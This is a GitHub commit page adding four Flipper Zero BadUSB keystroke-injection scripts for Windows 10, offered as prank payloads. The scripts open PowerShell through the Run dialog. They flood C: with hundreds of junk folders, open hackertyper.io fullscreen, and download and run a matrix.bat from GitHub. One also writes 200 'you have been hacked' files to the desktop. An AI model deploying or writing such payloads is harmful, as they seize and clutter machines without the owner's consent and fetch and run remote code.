Skip to content

Commit e07f730

Browse files
authored
Add files via upload
1 parent 6600975 commit e07f730

File tree

4 files changed

+52
-0
lines changed

4 files changed

+52
-0
lines changed

windows10/create folders in C.txt

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
REM Author: SeenKid (seenkid#1337 on Discord)
2+
REM Description: Creates a lot of folders in C:
3+
REM Version: 1.0
4+
DELAY 1000
5+
GUI r
6+
DELAY 500
7+
STRING powershell
8+
ENTER
9+
DELAY 900
10+
STRING (1..300) | % {new-item -type directory -path "C:\_331232ADA-$_"}
11+
ENTER
12+
DELAY 5000
13+
STRING (1..200) | % {new-item -type directory -path "C:\fdsA$_AAA$_"}
14+
ENTER
15+
DELAY 4000
16+
STRING (1..200) | % {new-item -type directory -path "C:\_$_"}
17+
ENTER

windows10/hackertyper.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
REM Author: SeenKid (seenkid#1337 on Discord)
2+
REM Description: Starts hackertyper.io in the default navigator
3+
REM Version: 1.0
4+
DELAY 500
5+
GUI r
6+
DELAY 500
7+
STRING https://hackertyper.io/
8+
ENTER
9+
DELAY 1000
10+
F11
11+
STRING SeenKid IS THE BEST

windows10/matrix.txt

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
REM Author: SeenKid (seenkid#1337 on Discord)
2+
REM Description: Starts a matrix command prompt
3+
REM Version: 1.0
4+
DELAY 500
5+
GUI r
6+
DELAY 500
7+
STRING powershell
8+
ENTER
9+
DELAY 500
10+
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/matrix.bat -OutFile "$DesktopPath/matrix.bat"; Start-Process "cmd.exe" "/c $DesktopPath/matrix.bat;"
11+
DELAY 100
12+
ENTER
Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
REM Author: SeenKid (seenkid#1337 on Discord)
2+
REM Description: Creates a lot of files with the text you have been hacked on desktop.
3+
REM Version: 1.0
4+
DELAY 500
5+
GUI r
6+
DELAY 500
7+
STRING powershell
8+
ENTER
9+
DELAY 500
10+
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/hacked.txt -OutFile $DesktopPath/H4ck3D.txt; while($ac -lt 200) { Copy-Item "$DesktopPath/H4ck3D.txt" -Destination "$DesktopPath/hacked$ac.txt"; $ac++};Start-Process -FilePath "$DesktopPath/H4ck3D.txt"
11+
DELAY 100
12+
ENTER

0 commit comments

Comments
 (0)